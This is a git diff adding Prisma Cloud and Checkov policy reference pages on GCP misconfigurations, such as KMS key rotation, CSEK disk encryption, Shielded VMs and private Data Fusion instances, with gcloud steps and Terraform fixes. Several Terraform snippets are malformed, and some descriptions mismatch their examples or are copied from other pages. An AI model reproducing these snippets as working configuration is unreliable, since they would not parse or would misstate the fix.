table data in a specific BigQuery dataset. +You can configure BigQuery permissions at a higher level in the Cloud IAM resource hierarchy. +Your configurations are inherited and based on the IAM structure you select to apply. +We recommend you ensure private datasets remain private by avoiding the *All Authenticated Users* option which gives all Google account holders access to the dataset, and makes the dataset public. + +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +{ + "resource "google_bigquery_dataset" "pass_special_group" { + dataset_id = "example_dataset" + friendly_name = "test" + description = "This is a test description" + location = "US" + + access { + role = "READER" + special_group = "projectReaders" + } + +}", +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/bc-gcp-general-4.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/bc-gcp-general-4.adoc new file mode 100644 index 000000000..9e331817a --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/bc-gcp-general-4.adoc @@ -0,0 +1,102 @@ +== GCP KMS Symmetric key not rotating in every 90 days + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 287ab1bc-62f5-4b2c-92a7-43c9ee7c6bb6 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleKMSRotationPeriod.py[CKV_GCP_43] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Google Cloud Key Management Service stores cryptographic keys in a hierarchical structure designed for access control management. +The format for the rotation schedule depends on the client library used. +In Terraform, the rotation period unit must be seconds. +A key is a named object representing a cryptographic key used for a specific purpose, including data protection. +The key material, the actual bits used for encryption, can change over time as new key versions are created. +A collection of files could be encrypted with the same key and people with decrypt permissions on that key would be able to decrypt those files. +We recommend you set a key rotation period, including start time. +A key can be created with a specified rotation period, which is the time when new key versions are generated automatically. +A key can also be created with a specified next rotation time. + +//// +=== Fix - Runtime + + +* GCP Console To change the policy using the GCP Console, follow these steps:* + + + +. Log in to the GCP Console at https://console.cloud.google.com. + +. Navigate to https://console.cloud.google.com/security/kms [Cryptographic Keys]. + +. Select the specific key ring. + +. From the list of keys, select the specific key and Click on the blade (3 dots) on the right side of the pop up. + +. Click * Edit rotation period*. + +. On the pop-up window, * Select a new rotation period* in days; ++ +this should be less than 90 days. ++ +Then select a * Starting on* date; ++ +this is when the rotation period begins. + + +* CLI Command* + + +Update and schedule rotation by * ROTATION_PERIOD* and * NEXT_ROTATION_TIME* for each key: +---- +gcloud kms keys update new +--keyring=KEY_RING +--location=LOCATION +--nextrotation-time=NEXT_ROTATION_TIME +--rotation-period=ROTATION_PERIOD +---- +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_kms_crypto_key +* *Arguments:* rotation_period + + +[source,go] +---- +{ + "resource "google_kms_crypto_key" "key" { + name = "crypto-key-example" + key_ring = google_kms_key_ring.keyring.id ++ rotation_period = "7776000s" +}", + +} +---- diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/bc-gcp-general-x.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/bc-gcp-general-x.adoc new file mode 100644 index 000000000..2feebb4a6 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/bc-gcp-general-x.adoc @@ -0,0 +1,120 @@ +== GCP VM disks not encrypted with Customer-Supplied Encryption Keys (CSEK) + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 952d8fdc-ad1f-4c19-ab00-1258d2745424 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleComputeDiskEncryption.py[CKV_GCP_37] + +|Severity +|LOW + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Customer-Supplied Encryption Keys (CSEK) are a feature in Google Cloud Storage and Google Compute Engine. +Google Compute Engine encrypts all data at rest by default. +Compute Engine handles and manages this encryption automatically, with no additional action required. +When you provide your own encryption keys Compute Engine uses your key to protect the Google-generated keys used to encrypt and decrypt your data. +Only users that provide the correct key can use resources protected by a customer-supplied encryption key. +Google does not store your keys on its servers and cannot access your protected data unless you provide the key. +If you forget or lose your key Google is unable to recover the key or to recover any data encrypted with that key. +To control and manage this encryption yourself, you must provide your own encryption keys. +We recommend you supply your own encryption keys for Google to use, at a minimum to encrypt business critical VM disks. +This helps protect the Google-generated keys used to encrypt and decrypt your data. + +//// +=== Fix - Runtime + + +* GCP Console Currently there is no way to update the encryption of an existing disk.* + + +Ensure you create new disks with Encryption set to Customer supplied. +To change the policy using the GCP Console, follow these steps: + +. Log in to the GCP Console at https://console.cloud.google.com. + +. Navigate to https://console.cloud.google.com/compute/disks [Compute Engine Disks]. + +. Click * CREATE DISK*. + +. Set * Encryption type* to * Customer supplied*. + +. In the dialog box, enter the * Key*. + +. Select * Wrapped key*. + +. Click * Create*. + + +* CLI Command* + + +In the gcloud compute tool, encrypt a disk, use the following command: `--csek-key-file flag during instance creation` +If you are using an RSA-wrapped key, use the gcloud beta component and the following command: +---- +gcloud (beta) compute instances create INSTANCE_NAME +--csek-key-file & lt;example-file.json> +---- +To encrypt a standalone persistent disk, use the following command: +---- +gcloud (beta) compute disks create DISK_NAME +--csek-key-file & lt;examplefile.json> +---- +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_compute_disk +* *Field:* disk_encryption_key + + +[source,go] +---- +// Option 1 +resource "google_compute_disk" "default" { + + ... + ++ disk_encryption_key { ++ raw_key = + or ++ kms_key_self_link = + } + + boot_disk { + + disk_encryption_key_raw = + } + +} +// Option 2 +resource "google_compute_instance" "default" { + + ... + ++ boot_disk { ++ disk_encryption_key_raw = + } +} +---- diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/bc-gcp-general-y.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/bc-gcp-general-y.adoc new file mode 100644 index 000000000..3ae9f9a47 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/bc-gcp-general-y.adoc @@ -0,0 +1,111 @@ +== GCP VM instance with Shielded VM features disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 17ad5166-9858-47e8-85ea-e42575a2112e + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleComputeShieldedVM.py[CKV_GCP_39] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Shielded VMs are virtual machines (VMs) on a Google Cloud Platform hardened by a set of security controls that help defend against rootkits and bootkits. +Shielded VM offers verifiable integrity on your Compute Engine VM instances, so you can be confident your instances have not been compromised by boot- or kernel-level malware or rootkits. +The verifiable integrity of a Shielded VM is achieved through the use of Secure Boot and integrity monitoring, see below for further details. +We recommend you launch Compute instances with Shielded VM enabled to defend against advanced threats, and ensure that the boot loader and firmware on your VMs are signed and untampered. +Shielded VM instances run firmware signed and verified using Google's Certificate Authority, ensuring the instance's firmware is unmodified and the root of trust for Secure Boot is established. +*Secure Boot* is a virtual trusted platform module (vTPM)-enabled Measured Boot. +It helps ensure that the system only runs authentic software by verifying the digital signature of all boot components and halting the boot process if signature verification fails. +*Integrity monitoring* helps you understand and make decisions about the state of your VM instances. +The Shielded VM vTPM enables Measured Boot by performing the measurements needed to create the integrity policy baseline used for comparison with measurements from subsequent VM boots to determine any changes. + +//// +=== Fix - Runtime + + +* GCP Console To change the policy using the GCP Console, follow these steps:* + + + +. Log in to the GCP Console at https://console.cloud.google.com. + +. Navigate to https://console.cloud.google.com/compute/instances [VM instances]. + +. Select the _instance name_ to view the * VM instance details* page. + +. Stop the instance, by clicking * STOP*. + +. When the instance has stopped, click * EDIT*. + +. In the * Shielded VM* section, turn on both * vTPM* and* Integrity Monitoring**. + +. Optionally, if you do not use any custom or unsigned drivers on the instance, turn on * Secure Boot*. + +. To modify the instance, click * SAVE*. + +. To restart the instance, click * START*. + + +* CLI Command* + + +You can only enable Shielded VM options on instances that have Shielded VM support. +For a list of Shielded VM public images, run the gcloud compute images list command with the following flags: _gcloud compute images list --project gce-uefi-images --no-standard-images_ + +. To stop the instance, use the following command: `gcloud compute instances stop INSTANCE_NAME` + +. To update the instance, use the following command: `gcloud compute instances update INSTANCE_NAME --shielded-vtpm --shielded-vmintegrity-monitoring` + +. Optionally, if you do not use any custom or unsigned drivers on the instance, to turn on secure boot use the following command: `gcloud compute instances update INSTANCE_NAME --shielded-vm-secure-boot` + +. To restart the instance, use the following command: `gcloud compute instances start INSTANCE_NAME` +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_compute_instance +* *Arguments:* enable_integrity_monitoring - set to true by default, should not be overriden, i.e should not be set to false. +enable_vtpm - set to true by default, should not be overriden, i.e should not be set to false. + + +[source,go] +---- +{ + "resource "google_compute_instance" "default" { + name = "test" + machine_type = "n1-standard-1" + zone = "us-central1-a" + boot_disk {} ++ shielded_instance_config { +- enable_integrity_monitoring = false +- enable_vtpm = false + } + +}", +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/encrypt-boot-disks-for-instances-with-cseks.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/encrypt-boot-disks-for-instances-with-cseks.adoc new file mode 100644 index 000000000..90a5018f6 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/encrypt-boot-disks-for-instances-with-cseks.adoc @@ -0,0 +1,141 @@ +== Boot disks for instances do not use CSEKs + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 1d7dcc71-2237-45ca-8ec3-7f8e71eb8444 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleComputeBootDiskEncryption.py[CKV_GCP_38] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + +Bridgecrew +Prisma Cloud +*Boot disks for instances do not use CSEKs* + + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 1d7dcc71-2237-45ca-8ec3-7f8e71eb8444 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleComputeBootDiskEncryption.py[CKV_GCP_38] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Customer-Supplied Encryption Keys (CSEK) are a feature in Google Cloud Storage and Google Compute Engine. +Google Compute Engine encrypts all data at rest by default. +Compute Engine handles and manages this encryption automatically, with no additional action required. +When you provide your own encryption keys Compute Engine uses your key to protect the Google-generated keys used to encrypt and decrypt your data. +Only users that provide the correct key can use resources protected by a customer-supplied encryption key. +Google does not store your keys on its servers and cannot access your protected data unless you provide the key. +If you forget or lose your key Google is unable to recover the key or to recover any data encrypted with that key. +To control and manage this encryption yourself, you must provide your own encryption keys. +We recommend you supply your own encryption keys for Google to use, at a minimum to encrypt boot disks for instances. +This helps protect the Google-generated keys used to encrypt and decrypt your data. + +//// +=== Fix - Runtime + + +* GCP Console Currently there is no way to update the encryption of an existing disk.* + + +Ensure you create new disks with Encryption set to Customer supplied. +To change the policy using the GCP Console, follow these steps: + +. Log in to the GCP Console at https://console.cloud.google.com. + +. Navigate to https://console.cloud.google.com/compute/disks [Compute Engine Disks]. + +. Click * CREATE DISK*. + +. Set * Encryption type* to * Customer supplied*. + +. In the dialog box, enter the * Key*. + +. Select * Wrapped key*. + +. Click * Create*. + + +* CLI Command* + + +In the gcloud compute tool, encrypt a disk, use the following command: `--csek-key-file flag during instance creation` +If you are using an RSA-wrapped key, use the gcloud beta component and the following command: `gcloud (beta) compute instances create INSTANCE_NAME --csek-key-file & lt;example-file.json>` +To encrypt a standalone persistent disk, use the following command: `gcloud (beta) compute disks create DISK_NAME --csek-key-file & lt;examplefile.json>` +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_compute_disk +* *Field:* disk_encryption_key +* *Resource:* google_compute_instance +* *Arguments:* boot_disk:disk_encryption_key_raw + + +[source,go] +---- +//Option 2 +resource "google_compute_disk" "default" { + name = "test-disk" + type = "pd-ssd" + zone = "us-central1-a" + image = "debian-8-jessie-v20170523" + physical_block_size_bytes = 4096 ++ disk_encryption_key { ++ raw_key = + or ++ kms_key_self_link = + } +} + +//Option 2 +resource "google_compute_instance" "default" { + name = "test" + machine_type = "n1-standard-1" + zone = "us-central1-a" + boot_disk { + disk_encryption_key_raw = + } +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-artifact-registry-repositories-are-encrypted-with-customer-supplied-encryption-keys-csek.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-artifact-registry-repositories-are-encrypted-with-customer-supplied-encryption-keys-csek.adoc new file mode 100644 index 000000000..2211a3aa0 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-artifact-registry-repositories-are-encrypted-with-customer-supplied-encryption-keys-csek.adoc @@ -0,0 +1,67 @@ +== GCP Artifact Registry repositories are not encrypted with Customer Supplied Encryption Keys (CSEK) + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| ce1a6762-478b-48c6-b01c-f5a1479512c6 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/ArtifactRegsitryEncryptedWithCMK.py[CKV_GCP_84] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +Customer-Supplied Encryption Keys (CSEK) are a feature in Google Cloud Storage and Google Compute Engine. +Google Compute Engine encrypts all data at rest by default. +Compute Engine handles and manages this encryption automatically, with no additional action required. +When you provide your own encryption keys Compute Engine uses your key to protect the Google-generated keys used to encrypt and decrypt your data. +Only users that provide the correct key can use resources protected by a customer-supplied encryption key. +Google does not store your keys on its servers and cannot access your protected data unless you provide the key. +If you forget or lose your key Google is unable to recover the key or to recover any data encrypted with that key. +To control and manage this encryption yourself, you must provide your own encryption keys. +We recommend you supply your own encryption keys for Google to use, at a minimum to encrypt business critical Artifact Registry repositories. +This helps protect the Google-generated keys used to encrypt and decrypt your data. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_artifact_registry_repository +* *Arguments:* kms_key_name + + +[source,go] +---- +{ + "resource "google_artifact_registry_repository" "pass" { + provider = google-beta + + location = "us-central1" + repository_id = "my-repository" + description = "example docker repository with cmek" + format = "DOCKER" + kms_key_name = google_kms_crypto_key.example.name +}", + +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-big-query-tables-are-encrypted-with-customer-supplied-encryption-keys-csek-1.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-big-query-tables-are-encrypted-with-customer-supplied-encryption-keys-csek-1.adoc new file mode 100644 index 000000000..75055ae94 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-big-query-tables-are-encrypted-with-customer-supplied-encryption-keys-csek-1.adoc @@ -0,0 +1,63 @@ +== GCP Big Query Datasets are not encrypted with Customer Supplied Encryption Keys (CSEK) + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 0993e534-88c1-40c2-913b-0d10c8806c52 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/BigQueryDatasetEncryptedWithCMK.py[CKV_GCP_81] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +Customer-Supplied Encryption Keys (CSEK) are a feature in Google Cloud Storage that is available for Big Query Tables. +Google does not store your keys on its servers and cannot access your protected data unless you provide the key. +If you forget or lose your key Google is unable to recover the key or to recover any data encrypted with that key. +To control and manage this encryption yourself, you must provide your own encryption keys. +We recommend you supply your own encryption keys for Google to use, at a minimum to encrypt business critical Big Query Tables. +This helps protect the Google-generated keys used to encrypt and decrypt your data. + +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +{ + "resource "google_bigquery_dataset" "pass" { + dataset_id = var.dataset.dataset_id + friendly_name = var.dataset.friendly_name + description = var.dataset.description + location = var.location + default_table_expiration_ms = var.dataset.default_table_expiration_ms + + default_encryption_configuration { + kms_key_name = google_kms_crypto_key.example.name + } + +}", +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-big-query-tables-are-encrypted-with-customer-supplied-encryption-keys-csek.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-big-query-tables-are-encrypted-with-customer-supplied-encryption-keys-csek.adoc new file mode 100644 index 000000000..b7de1a7e4 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-big-query-tables-are-encrypted-with-customer-supplied-encryption-keys-csek.adoc @@ -0,0 +1,82 @@ +== GCP Big Query Tables are not encrypted with Customer Supplied Encryption Keys (CSEK) + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| a87cc89c-014f-43c0-9e4c-b77776ed96d4 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/BigQueryTableEncryptedWithCMK.py[CKV_GCP_80] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +Customer-Supplied Encryption Keys (CSEK) are a feature in Google Cloud Storage and Google Compute Engine. +Google Compute Engine encrypts all data at rest by default. +Compute Engine handles and manages this encryption automatically, with no additional action required. +When you provide your own encryption keys Compute Engine uses your key to protect the Google-generated keys used to encrypt and decrypt your data. +Only users that provide the correct key can use resources protected by a customer-supplied encryption key. +Google does not store your keys on its servers and cannot access your protected data unless you provide the key. +If you forget or lose your key Google is unable to recover the key or to recover any data encrypted with that key. +To control and manage this encryption yourself, you must provide your own encryption keys. +We recommend you supply your own encryption keys for Google to use, at a minimum to encrypt business critical Big Query Tables. +This helps protect the Google-generated keys used to encrypt and decrypt your data. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_bigquery_table +* *Arguments:* encryption_configuration.kms_key_name + + +[source,go] +---- +{ + " +resource "google_bigquery_table" "pass" { + dataset_id = google_bigquery_dataset.default.dataset_id + table_id = "sheet" + + external_data_configuration { + autodetect = true + source_format = "GOOGLE_SHEETS" + + google_sheets_options { + skip_leading_rows = 1 + } + + + source_uris = [ + "https://docs.google.com/spreadsheets/d/123456789012345", + ] + } + + + encryption_configuration { + kms_key_name = var.kms_key_name + } + +}", +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-big-table-instances-are-encrypted-with-customer-supplied-encryption-keys-cseks.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-big-table-instances-are-encrypted-with-customer-supplied-encryption-keys-cseks.adoc new file mode 100644 index 000000000..a8fb911a1 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-big-table-instances-are-encrypted-with-customer-supplied-encryption-keys-cseks.adoc @@ -0,0 +1,73 @@ +== GCP Big Table Instances are not encrypted with Customer Supplied Encryption Keys (CSEKs) + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 8e588018-92ea-40f2-a5fe-ad8ccc030b65 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/BigTableInstanceEncryptedWithCMK.py[CKV_GCP_85] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +Customer-Supplied Encryption Keys (CSEK) are a feature in Google Cloud Storage and Google Compute Engine. +Google Compute Engine encrypts all data at rest by default. +Compute Engine handles and manages this encryption automatically, with no additional action required. +When you provide your own encryption keys Compute Engine uses your key to protect the Google-generated keys used to encrypt and decrypt your data. +Only users that provide the correct key can use resources protected by a customer-supplied encryption key. +Google does not store your keys on its servers and cannot access your protected data unless you provide the key. +If you forget or lose your key Google is unable to recover the key or to recover any data encrypted with that key. +To control and manage this encryption yourself, you must provide your own encryption keys. +We recommend you supply your own encryption keys for Google to use, at a minimum to encrypt business critical Big Table Instances. +This helps protect the Google-generated keys used to encrypt and decrypt your data. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_bigtable_instance +* *Arguments:* cluster.kms_key_name + + +[source,go] +---- +{ + "resource "google_bigtable_instance" "pass" { + name = "tf-instance" + + cluster { + cluster_id = "tf-instance-cluster" + num_nodes = 1 + storage_type = "HDD" + kms_key_name = google_kms_crypto_key.example.name + } + + + labels = { + my-label = "prod-label" + } + +}", +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-cloud-build-workers-are-private.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-cloud-build-workers-are-private.adoc new file mode 100644 index 000000000..bdf9eb9d4 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-cloud-build-workers-are-private.adoc @@ -0,0 +1,62 @@ +== GCP cloud build workers are not private + + +=== Policy Details +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 954e7d8e-bbb5-427f-a43b-266552d37b56 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/CloudBuildWorkersArePrivate.py[CKV_GCP_86] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + +Google Cloud Build is a fully managed continuous integration and delivery platform that allows developers to build, test, and deploy applications on Google Cloud Platform. +When you create a build using Cloud Build, the service automatically provisions a build worker to execute the build. +Build workers are virtual machines that are used to run the build steps defined in your build configuration. +They are responsible for executing the commands specified in your build configuration, such as building a Docker image, running tests, or deploying an application. +Build workers can be either public or private. +Public build workers have internet access and can access external resources or services, while private build workers do not have internet access and are isolated from external networks. +You can choose which type of worker to use based on your build requirements and the level of security and isolation you need. +We recommend you remove the public IPs for your Data Fusion instance. +By isolating your build workers from the internet, you can reduce the risk of external threats such as hackers or malware infiltrating your build environment. + +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +{ + "resource "google_cloudbuild_worker_pool" "pass" { + name = "my-pool" + location = "europe-west1" + worker_config { + disk_size_gb = 100 + machine_type = "e2-standard-4" + no_external_ip = true + } + +}", +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-cloud-storage-has-versioning-enabled.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-cloud-storage-has-versioning-enabled.adoc new file mode 100644 index 000000000..ca572f9d6 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-cloud-storage-has-versioning-enabled.adoc @@ -0,0 +1,50 @@ +== GCP Cloud storage does not have versioning enabled + +Enabling versioning for your Google Cloud Platform (GCP) Cloud Storage can help improve the security and management of your data. +Versioning allows you to keep multiple versions of an object in your storage bucket, and can be useful for a variety of purposes. + +=== Policy Details +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 5891ec5e-06a3-4aed-acc7-f23548b8dd5e + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/CloudStorageVersioningEnabled.py[CKV_GCP_78] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +{ + "resource "google_storage_bucket" "pass" { + name = "foo" + location = "EU" + + versioning = { + enabled = true + }= + +}", +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-data-flow-jobs-are-encrypted-with-customer-supplied-encryption-keys-csek.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-data-flow-jobs-are-encrypted-with-customer-supplied-encryption-keys-csek.adoc new file mode 100644 index 000000000..c1f23d318 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-data-flow-jobs-are-encrypted-with-customer-supplied-encryption-keys-csek.adoc @@ -0,0 +1,69 @@ +== GCP data flow jobs are not encrypted with Customer Supplied Encryption Keys (CSEK) + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 16e69d18-0a3c-4049-9c9c-a1f0d1bc7212 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/DataflowJobEncryptedWithCMK.py[CKV_GCP_90] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +Customer-Supplied Encryption Keys (CSEK) are a feature in Google Cloud Storage and Google Compute Engine. +Google Compute Engine encrypts all data at rest by default. +Compute Engine handles and manages this encryption automatically, with no additional action required. +When you provide your own encryption keys Compute Engine uses your key to protect the Google-generated keys used to encrypt and decrypt your data. +Only users that provide the correct key can use resources protected by a customer-supplied encryption key. +Google does not store your keys on its servers and cannot access your protected data unless you provide the key. +If you forget or lose your key Google is unable to recover the key or to recover any data encrypted with that key. +To control and manage this encryption yourself, you must provide your own encryption keys. +We recommend you supply your own encryption keys for Google to use, at a minimum to encrypt business critical data flow jobs. +This helps protect the Google-generated keys used to encrypt and decrypt your data. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_dataflow_job +* *Arguments:* kms_key_name + + +[source,go] +---- +{ + "resource "google_dataflow_job" "pass" { + name = "dataflow-job" + template_gcs_path = "gs://my-bucket/templates/template_file" + temp_gcs_location = "gs://my-bucket/tmp_dir" + parameters = { + foo = "bar" + baz = "qux" + } + + kms_key_name = "SecretSquirrel" +}", + +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-data-fusion-instances-are-private.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-data-fusion-instances-are-private.adoc new file mode 100644 index 000000000..b38b4fae6 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-data-fusion-instances-are-private.adoc @@ -0,0 +1,71 @@ +== GCP data fusion instances are not private + + +=== Policy Details +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| dad1746b-73ac-45c8-bf9f-17531937dbd1 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/DataFusionPrivateInstance.py[CKV_GCP_87] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + +GCP Data fusion is a fully managed, cloud-native data integration service that helps users build and manage ETL (extract, transform, and load) pipelines. +It is designed to simplify and accelerate the process of building and maintaining data pipelines, allowing users to create data pipelines that can ingest data from a variety of sources, transform and cleanse the data, and then load the data into a destination of their choice. +A Data Fusion instance is a logical container that is used to host and run data pipelines. +It is created within a Google Cloud project, and users can create multiple instances within a single project. +Each instance has its own resources and configuration settings, allowing users to tailor the instance to their specific needs. +We recommend you remove the public IPs for your Data Fusion instance. + +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +{ + "resource "google_data_fusion_instance" "pass" { + provider = google-beta + name = "my-instance" + description = "My Data Fusion instance" + region = "us-central1" + type = "BASIC" + enable_stackdriver_logging = true + enable_stackdriver_monitoring = true + labels = { + example_key = "example_value" + } + + private_instance = true + network_config { + network = "default" + ip_allocation = "10.89.48.0/22" + } + + version = "6.3.0" + dataproc_service_account = data.google_app_engine_default_service_account.default.email +}", + +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-datafusion-has-stack-driver-logging-enabled.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-datafusion-has-stack-driver-logging-enabled.adoc new file mode 100644 index 000000000..781a2c256 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-datafusion-has-stack-driver-logging-enabled.adoc @@ -0,0 +1,65 @@ +== GCP DataFusion does not have stack driver logging enabled + +It is recommended to have a proper logging process for GCP DataFusion stack driver in order to track configuration changes conducted manually and programmatically and trace back unapproved changes. + +=== Policy Details +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 619ea932-56a1-499f-8e54-be6f7aa2e96e + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/DataFusionStackdriverLogs.py[CKV_GCP_104] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +{ + " + +resource "google_data_fusion_instance" "pass" { + project = "examplea" + provider = google-beta + name = "my-instance" + description = "My Data Fusion instance" + region = "us-central1" + type = "BASIC" + enable_stackdriver_logging = true + enable_stackdriver_monitoring = true + labels = { + example_key = "example_value" + } + + //private_instance = false + network_config { + network = "default" + ip_allocation = "10.89.48.0/22" + } + + version = "6.3.0" + dataproc_service_account = data.google_app_engine_default_service_account.default.email +}", + +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-general-policies/ensure-gcp-datafusion-has-stack-driver-monitoring-enabled.adoc 